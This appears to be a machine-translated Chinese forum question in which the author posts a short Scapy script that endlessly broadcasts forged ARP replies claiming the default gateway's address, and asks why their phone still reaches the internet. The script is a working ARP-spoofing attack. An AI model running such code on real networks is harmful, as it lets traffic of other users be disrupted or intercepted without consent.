我写的ARP欺骗即使在我嗅探数据包似乎似乎所有事情都应该起作用的情况下也不起作用。
我写了一个简单的ARP欺骗,告诉子网中的每个人我都是默认的逃亡者。 这是我的代码:
from scapy.all import *
import sys
DEFULT_GETAWAY = "192.168.1.1"
MY_MAC = "30:24:30:8F:B4:64"
def main():
while(1):
pkt = send(ARP(op=ARP.is_at, psrc=DEFULT_GETAWAY, pdst="255.255.255.255", hwsrc=MY_MAC, hwdst="ff:ff:ff:ff:ff:ff"))
if __name__ == "__main__" :
main()
我希望当我尝试通过手机(连接到路由器)访问互联网时,它将无法正常工作,但确实可以。
鲨鱼的结果: 192.168.1.1位于30:24:30:8f:b4:64(在嗅探中似乎一切正常)。